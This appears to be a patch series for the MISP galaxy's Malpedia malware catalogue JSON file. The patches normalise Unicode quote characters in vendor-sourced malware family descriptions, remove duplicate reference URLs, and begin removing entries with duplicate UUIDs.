collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it\u2019s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.", + "description": "According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64‑encoded text that corresponds to AES‑encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it’s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", @@ -33997,7 +33997,7 @@ "value": "MakLoader" }, { - "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension \u201c.makop\u201d. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", + "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop", @@ -34014,7 +34014,7 @@ "value": "Makop" }, { - "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension \u201c.makop\u201d. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", + "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware", @@ -34982,7 +34982,7 @@ "value": "Metamorfo" }, { - "description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META \u2013 a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.", + "description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META – a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer", @@ -35602,7 +35602,7 @@ "value": "Mirai (Windows)" }, { - "description": "According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users\u2019 browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously. Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.", + "description": "According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users’ browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously. Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast", @@ -35674,7 +35674,7 @@ "value": "Misha" }, { - "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald\u2019s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.", + "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu", @@ -35816,7 +35816,7 @@ "value": "MoDi RAT" }, { - "description": "ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS \u2013 a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them \u2013 named GetMicInfo \u2013 contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions. ", + "description": "ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS – a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them – named GetMicInfo – contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe", @@ -36156,7 +36156,7 @@ "value": "Mosquito" }, { - "description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim\u2019s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.", + "description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim’s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker", @@ -39017,7 +39017,7 @@ "value": "Peppy RAT" }, { - "description": "The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim\u2019s machine. What\u2019s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.", + "description": "The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim’s machine. What’s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", @@ -39381,7 +39381,7 @@ "value": "PILLOWMINT" }, { - "description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke\u2019s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.", + "description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke’s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke", @@ -40287,7 +40287,7 @@ "value": "Poulight Stealer" }, { - "description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to \u201csecurely\u201d test the ransomware protection capabilities of security vendor products.", + "description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware", @@ -40869,7 +40869,7 @@ "value": "pupy (Windows)" }, { - "description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google\u2019s Protocol Buffer message format ", + "description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google’s Protocol Buffer message format ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter", @@ -40931,7 +40931,7 @@ "value": "PurpleFox" }, { - "description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user\u2019s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.", + "description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user’s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave", @@ -42230,7 +42230,7 @@ "value": "Rarog" }, { - "description": "This ransomware encrypts all user\u2019s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.", + "description": "This ransomware encrypts all user’s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", @@ -45008,7 +45008,7 @@ "value": "Satan" }, { - "description": "According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer\u2019s master boot record (MBR) and prevents it from starting.", + "description": "According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer’s master boot record (MBR) and prevents it from starting.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", @@ -45764,7 +45764,7 @@ "value": "SharpMapExec" }, { - "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called \u201cStage_One\u201d. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ", + "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called “Stage_One”. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage", @@ -46991,7 +46991,7 @@ "value": "Solarbot" }, { - "description": "Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.\r\n\r\nSome of SolarMarker\u2019s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims\u2019 web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.\r\n\r\nThe malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.", + "description": "Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.\r\n\r\nSome of SolarMarker’s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims’ web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.\r\n\r\nThe malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker", @@ -47421,7 +47421,7 @@ "value": "SpyEye" }, { - "description": "According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim\u2019s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.", + "description": "According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim’s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle", @@ -47650,7 +47650,7 @@ "value": "Stealc" }, { - "description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor\u2019s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.", + "description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor’s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium", @@ -47678,7 +47678,7 @@ "value": "Stealer0x3401" }, { - "description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target\u2019s backend. Hacker\u2019s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target\u2019s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.", + "description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target’s backend. Hacker’s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target’s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker", @@ -48418,7 +48418,7 @@ "value": "swen" }, { - "description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim\u2019s Active Directory environment.", + "description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim’s Active Directory environment.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swiftslicer", @@ -48942,7 +48942,7 @@ "value": "TeamSpy" }, { - "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.", + "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop", @@ -49740,7 +49740,7 @@ "value": "tomiris" }, { - "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files \u2013 temp.txt and temp2.txt \u2013 within the same directory of its execution.", + "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf", @@ -51133,7 +51133,7 @@ "value": "Unidentified 078 (Zebrocy Nim Loader?)" }, { - "description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target\u2019s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.", + "description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080", @@ -52366,7 +52366,7 @@ "value": "Vulturi" }, { - "description": "Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.\r\n\r\nIt uses a simple XOR for encryption of its configuration and network traffic. \r\n\r\nIt sends detailed information about the victim's environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.\r\n\r\nIt supports more than 20 commands that include operations on the victim\u2019s filesystem, basic process management, command line execution, file exfiltration, and the download and memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. Also, it can monitor newly connected drives and the number of logged-on users.\r\n\r\nIt has MPRD.dll as the internal DLL name, and a single export SamIInitialize.\r\n\r\nVyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.", + "description": "Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.\r\n\r\nIt uses a simple XOR for encryption of its configuration and network traffic. \r\n\r\nIt sends detailed information about the victim's environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.\r\n\r\nIt supports more than 20 commands that include operations on the victim’s filesystem, basic process management, command line execution, file exfiltration, and the download and memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. Also, it can monitor newly connected drives and the number of logged-on users.\r\n\r\nIt has MPRD.dll as the internal DLL name, and a single export SamIInitialize.\r\n\r\nVyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva", @@ -52513,7 +52513,7 @@ "value": "WastedLoader" }, { - "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim\u2019s name and the string \u2018wasted\u2019. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", + "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker", @@ -53807,7 +53807,7 @@ "value": "X-Tunnel (.NET)" }, { - "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", @@ -54078,7 +54078,7 @@ "value": "YourCyanide" }, { - "description": "According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it\u2019s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.", + "description": "According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it’s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ytstealer", @@ -54825,4 +54825,4 @@ } ], "version": 19000 -} +} From b79b75dba4140da7a703fe9450f65877868f13a5 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 26 Sep 2023 10:58:46 +0200 Subject: [PATCH 05/16] chg: [malpedia] duplicate refs removed --- clusters/malpedia.json | 12 +----------- 1 file changed, 1 insertion(+), 11 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 29d50a2..71dfe47 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -7048,7 +7048,6 @@ "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf", "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt", "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/", "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera", "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials", @@ -11695,7 +11694,6 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader", "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader" ], "synonyms": [], @@ -11847,7 +11845,6 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002", "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002" ], "synonyms": [], @@ -11860,7 +11857,6 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003", "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003" ], "synonyms": [], @@ -22169,7 +22165,6 @@ "https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/", "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat", "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader", "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses", "https://securityintelligence.com/posts/email-campaigns-leverage-updated-dbatloader-deliver-rats-stealers/", "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html", @@ -25523,7 +25518,6 @@ "description": "FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations. \r\n", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader", "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader" ], "synonyms": [], @@ -28033,8 +28027,7 @@ "https://cert.gov.ua/article/38374", "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", "https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel" + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya" ], "synonyms": [], "type": [] @@ -30075,7 +30068,6 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart", "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart" ], "synonyms": [ @@ -31774,7 +31766,6 @@ "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer", "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ @@ -45960,7 +45951,6 @@ "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html", "https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/", - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", "https://s.tencent.com/research/report/479.html", "https://s.tencent.com/research/report/659.html", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", From 67543e2437ff10f5a070c1e11bbd77876bf0c39c Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 26 Sep 2023 11:17:44 +0200 Subject: [PATCH 06/16] chg: [galaxy] duplicate UUIDs removed --- clusters/malpedia.json | 132 ----------------------------------------- 1 file changed, 132 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 71dfe47..b1d9303 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -3029,18 +3029,6 @@ "uuid": "55626b63-4b9a-468e-92ae-4b09b303d0ed", "value": "Unidentified APK 004" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005" - ], - "synonyms": [], - "type": [] - }, - 